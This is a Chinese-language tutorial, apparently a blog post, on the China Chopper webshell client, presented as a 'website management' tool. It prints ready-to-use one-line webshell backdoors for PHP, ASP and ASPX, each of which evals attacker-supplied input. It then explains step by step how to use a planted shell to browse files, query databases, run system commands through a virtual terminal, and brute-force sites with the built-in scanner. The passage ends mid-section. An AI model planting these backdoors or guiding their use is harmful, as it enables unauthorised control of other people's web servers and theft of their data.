0x01 介绍
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科中国菜刀_百度百科)
菜刀的界面:
0x02 使用
1.常见的管理
右键空白处->添加
添加SHELL -> 进行相关的配置。
我的配置:
密码:key
脚本类型:PHP
最后->点击添加
相关的介绍:
这里的WEBSHELL是我们常说的一句话木马:
PHP一句话木马:<?php @eval($_POST['key']);?>
ASP一句话木马:<%eval request['key']%>
ASPX一句话木马:<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%>
眼尖的童鞋已经看到了三个里面都带有key这个单词,没错这个就是密码,大家可以自行修改为自己使用的密码。
功能概述:
文件管理:
打开方式 [右键WEBSHELL->单击文件管理]
管理方式 [右键上图中方框内的任何区域进行管理]
数据库管理:
打开方式 [右键WEBSHELL->数据库管理]
可以看到是空白的,这时候就需要配置数据库信息了。
配置方式1.[单击配置]
出现了一个配置窗口。(前提你要有网站数据库的配置信息才可以进行配置)
我的配置信息:
数据库类型:Mysql
用户名:root
密码:root
配置方式 2.[选择数据库]
可以看到红色方框那边有MYSQL、MSSQL、MSSQL2、ORACLE等数据库类型。
我是Mysql的就选择mysql的示例:
配置后 [单击提交]:
管理方式:
虚拟终端:
打开方式 [右键WEBSHELL->单击虚拟终端]
红色方框里是系统的一些信息。我们在D:WWW>后面输入相应的cmd命令即可(Linux就输入shell命令)
2.网站扫描
打开方式 [单击菜刀图标->单击网站扫描]
(也可以在软件里使用快捷键Alt+K去打开)
使用方法:
把http://www.http://maicaidao.com替换成自己的测试站点即可。
功能:
1.反向IP(reverse_ip)
2.爬虫(spider)
3.爆破(crack)
其他按照这些提示都应该能懂就不一一去说了。
3.浏览器功能
打开方法如上图示意。
对着网页进行右击:
上图是一些浏览器方面的功能。
单击扩展功能:
可以进行cookie的修改。
同时也可以单击菜刀图标->浏览器:
可以进行选择:
#代表开启 可以单击进行取消开启。
4.其他功能
第一:设置菜刀启动密码(防止自己的WEBSHELL泄露出去)
打开方式 [单击菜刀图标->单击设置启动密码]
点击是,就成功设置密码为test。
然后我们关掉菜刀再打开菜刀:
输入我们的密码再可以设置新的密码:
我相信着点英语难不倒各位也不解释了。
也可以把启动密码取消掉:
第二:日程提醒,使用方法如下:
